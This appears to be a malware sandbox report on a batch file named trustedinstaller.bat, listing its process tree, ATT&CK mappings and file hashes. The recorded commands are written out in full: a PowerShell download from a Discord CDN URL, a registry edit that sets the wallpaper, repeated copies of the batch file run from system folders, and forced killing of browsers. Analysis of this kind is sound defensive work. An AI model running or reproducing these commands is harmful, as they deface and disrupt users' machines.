        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:4444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:4748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:4936
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:7140
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:4764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:5036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:3476
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:3932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:2304
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4212
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:5224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:2548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:3244
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:5800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:5908
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:9952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:5608
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5880
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:640
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7136
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:4876
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:2732
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:3264
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:5564
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      Kills process with taskkill
      PID:5632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:1904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1572
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3652
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6604
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:2340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3996
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6248
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:3812
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3840
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3232
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6284
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6772
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7940
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:6616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:3884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:3776
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7964
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:1980
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7948
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:3332
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7956
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:5108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2644
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6736
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8472
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:3760
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:5168
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      Kills process with taskkill
      PID:5384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "chrome.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "firefox.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "msedge.exe"
    3⤵
    PID:6108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "opera.exe"
    3⤵
    - Kills process with taskkill
    PID:5264
- C:\Windows\system32\taskkill.exe
  taskkill /f /im "chrome.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- C:\Windows\system32\taskkill.exe
  taskkill /f /im "firefox.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1092
- C:\Windows\system32\taskkill.exe
  taskkill /f /im "msedge.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3924
- C:\Windows\system32\taskkill.exe
  taskkill /f /im "opera.exe"
  2⤵
  PID:3300
- C:\Windows\system32\taskkill.exe
  taskkill /f /im "brave.exe"
  2⤵
  PID:6092
- C:\Windows\system32\taskkill.exe
  taskkill /f /im "vivaldi.exe"
  2⤵
  - Kills process with taskkill
  PID:9808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\BatchFile\trustedinstaller.bat

Filesize
3KB

MD5
a342c02d8b85d351af8871776fc67dd7

SHA1
4b7c7e5697cee05354f0902a3c40d35c7c892a7d

SHA256
9802eda5439017e0b2fe42d53bbeac75176c52b4383e33d1a4cb445a00b16b8b

SHA512
7ae1f71e87dc52c2dd640c025ca623304e28717119c52107163d905e8f17d6a20de243e6a1cf8f75ab9e797224b47eae199a669e209998620625b20c099657d5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0bcfaf529e351d37d8cc8381bb428226

SHA1
f97d3e91d802e845de0208e891135a328bc76d1e

SHA256
8221ec7f46a89501e67bb5a7cc425d16c129a7f08c58fb1b6d2f243301cb7f4e

SHA512
15d860713fc80d1fc595579317faa07da6fe2fa804c28b2a29ef1b05cd1eb6c3b360b9b3719a04d2285ee05963141113970817aaf887ee65a814c4b988937a32

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X2S1Q9KFZ70HYBU8PAQQ.temp

Filesize
7KB

MD5
6269f3981a84784d79fa329cbabafd47

SHA1
be74eea126dacdaf847e85bd0b9e8cd1208bdad0

SHA256
84860e05771030784f2d09f1da8559f21809f1edf758fa084833fa1aa7d6d555

SHA512
5b59ee965832cf698626f6e6b400e81b31de6fa64ee5e4da0e00ed635a7e2b925fd0120929d3489e2fa14a0cb7aa9ec9ef193348f63e1e0ce37a336ac2c7544e

Download Submit
memory/2348-7-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2348-9-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2348-10-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2348-11-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2348-12-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2348-8-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2348-4-0x000007FEF540E000-0x000007FEF540F000-memory.dmp

Filesize
4KB

Download
memory/2348-6-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2348-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2652-38-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2652-52-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download